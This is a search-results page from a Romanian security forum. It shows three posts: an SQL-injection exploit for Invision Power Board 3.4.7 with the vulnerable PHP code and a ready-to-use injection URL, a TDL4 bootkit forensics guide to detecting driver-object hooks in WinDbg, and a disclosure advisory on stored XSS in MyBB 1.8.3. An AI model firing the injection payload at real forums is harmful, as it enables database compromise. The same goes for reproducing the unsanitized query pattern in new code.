Jump to content

Search the Community

Showing results for tags 'field'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 3 results

  1. # Exploit Title: Invision Power Board <= 3.4.7 SQL Injection # Date: 29.05.2015 # Exploit Author: ZeroDay # Software Link: http://www.invisionpower.com/ # Version: <= 3.4.7 # Tested on: 3.4.7 # About: For the G-Owl with Love vuln code admin/applications/members/modules_public/list/view.php //----------------------------------------- // Custom fields? //----------------------------------------- if ( count( $this->custom_fields->out_fields ) ) { foreach( $this->custom_fields->out_fields as $id => $data ) { if ( !empty($this->request[ 'field_' . $id ]) ) { $_queryPP = true; if( is_array($this->request[ 'field_' . $id ]) ) { foreach( $this->request[ 'field_' . $id ] as $k => $v ) { $this->request[ 'field_' . $id ][ $k ] = urldecode($v); $url['field_' . $id] = "field_{$id}[{$k}]=" . $v; } } else { $url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ]; $this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]); } if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' ) { $query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'"; } else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' ) { if ( count( $this->request[ 'field_' . $id ] ) ) { if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ) { $cboxFields = array(); foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'"; } $query[] = "( " . implode( ' OR ', $cboxFields ) . " )"; } else { foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $query[] = "p.field_{$id} LIKE '%|{$k}|%'"; } } } } else { $query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'"; } } } } ...... POC index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1 Source
  2. Part 1 .: https://rstforums.com/forum/98013-bootkit-disk-forensics-1-a.rst As I explained in the previous article: DriverStartIo is used by older miniports to actually perform the disk I/O, it takes 2 parameters (a device object and an IRP), exactly the same as IoCallDriver does. The call to DriverStartIo is done with IoStartPacket; however, the device object passed is not that of the miniport, but instead a device associated with the port the target disk is connected to (in my case IdePort1). IRP_MJ_SCSI points to IdePortDispatch in atapi.sys, by disassembling it we can see exactly how the required device object is retrieved from the DeviceExtension field of the miniport's device object. The call logic is something like this: Get the miniport's device extension from its device object (passed to us in the call). Get IdePort1's device extension from offset 0x5C into the miniport's device extension. Get IdePort1's device object from offset 0x0C into its device extension. Call IoStartPacket with the IRP and IdePort1's device object. As both the miniport and IdePort devices are created by atapi.sys, the DriverObject field of both devices' objects point to the same driver object; thus, hooking DriverStartIo is as simple as replacing the address in the driver's object. Detecting DriverStartIo hook with WinDbg For basic DriverStartIo hook detection we can simply follow the same process as for major function hooks: First, we find the boot disk and list it's stack. As I explained in the previous article, modifications made by TDL4 will cause the !drvobj and !devobj commands to think the object is invalid, it's not. You will probably want to check each driver object in the stack (for the invalid DeviceObject you can again use "dt _DEVICE_OBJECT <address>" to find the DriverObject field). With most bootkits, the lowest level driver is always the one hooked, so I'll use this in my example. You can see here that DriverStartIo isn't hooked because the address resolve to its proper symbol; however, this isn't actually the real driver object. Earlier i explained that IoStartPacket is always called with the device object of IdePort1, not the disk miniport: This means that when IoStartPacket called DriverStartIo internally, it does so by getting the driver object from the DriverObject field of IdePort1's device object, then getting the DriverStartIo field from that. Obviously this means that to hook DriverStartIo, one could simply just create a copy of atapi's driver object, with the DriverStartIo field modified, then set the DriverObject field of IdePort1's device object to point to the new, malicious driver object (this way on IdePort1 will point to the hooked driver, the rest will point to the original). As it happens TDL4 actually does the opposite, it hooks the real atapi driver object, then replaces the DriverObject field of the disk miniport's device object with the address of an identical driver object, without the DriverStartIo field modified.). If you know what you're looking for, fake driver objects are easy to detect. All devices created by a driver should point the same driver object, so simply enumerating the devices created by the miniport's driver then making sure all the DriverObject fields point to the same address is all that's needed. This can be done a multitude of ways. Method 1: DrvObj The fake driver object will have the same name as the real one (in my case "\driver\atapi"), all you need to do is type "!drvobj \driver\atapi 2" to get the real driver's object (this is a downside of TDL4 hooking the real driver object instead of a spoofed one). Method 2: NextDevice Starting with the miniport device, enumerate devices using "dt _DEVICE_OBJECT <address>" and the NextDevice field of each device's object. We're looking for any DriverObject field that dosen't match that of the miniport (this is the real driver object). Method 3: DeviceExtension This is the least reliable way, as the device extension could change from system to system, but as I mentioned earlier: you can find IdePort1's device extension at offset 0x5C isn't the miniport's device extension, then from IdePort1's device extension you can find its device object at offset 0x0C (IdePort1's device object will point to the real driver object). We can actually find the DeviceObject in a single commands using this overly complicated WinDbg-C++ syntax: "dt _DEVICE_OBJECT poi(poi(@@C++(((nt!_DEVICE_OBJECT *)<address>)->DeviceExtension)+0x5C)+0x0C)", where "<address>" is the miniport device object. Source
  3. Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3 Advisory ID: SROEADV-2015-15 Author: Steffen Rösemann Affected Software: MyBB v. 1.8.3 Vendor URL: http://www.mybb.com Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the administrative backend. ================== Technical Details: ================== The stored XSS-vulnerabilities can be found in different modules in the following locations of a common MyBB installation: ====================== Module "config-attachment_types" ====================== via form-field MIME-type: http://{TARGET}/admin/index.php?module=config-attachment_types&action=add executed in: e.g. http:// {TARGET}/admin/index.php?module=config-attachment_types =============== Module "config-mycode" =============== via form fields "title" and "short description": http://{TARGET}/admin/index.php?module=config-mycode&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode =================== Module "forum-management" =================== via form field "title": http://{TARGET}/admin/index.php?module=forum-management&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=forum ============== Module "user-groups" ============== via form fields "title" and/or "short description": http://{TARGET}/admin/index.php?module=user-groups&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups ================ Module "style-templates" ================ via form field "name": http://{TARGET}/admin/index.php?module=style-templates&action=add_set executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates ==================================== Module "style-templates" in action "add_template_group" ==================================== via form field "title": http:// {TARGET}/admin/index.php?module=style-templates&action=add_template_group executed in: e.g. http:// {TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID} ============= Module "tool-tasks" ============= via form field "title": http://{TARGET}/admin/index.php?module=tools-tasks&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================= Module "config-post_icons" ================= via form field "name": http://{TARGET}/admin/index.php?module=config-post_icons&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ============= Module "user-titles" ============= via form field "title to assign": http://{TARGET}/admin/index.php?module=user-titles&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================ Module "config-banning" ================ via form field "username": http://{TARGET}/admin/index.php?module=config-banning&type=usernames executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ========= Solution: ========= Upgrade to v. 1.8.4. ==================== Disclosure Timeline: ==================== 02/03-Feb-2015 – found the vulnerabilities 03-Feb-2015 - informed the developers according to their security issue rules (see [3]) 03-Feb-2015 – release date of this security advisory [without technical details] 03-Feb-2015 - vendor replied, issues will be patched 15-Feb-2015 - vendor released patch v. 1.8.4 (see [4]) 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://www.mybb.com [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-15.html [3] http://www.mybb.com/get-involved/security/ [4] http://blog.mybb.com/2015/02/15/mybb-1-8-4-released-feature-update-security-maintenance-release/ Source
×
×
  • Create New...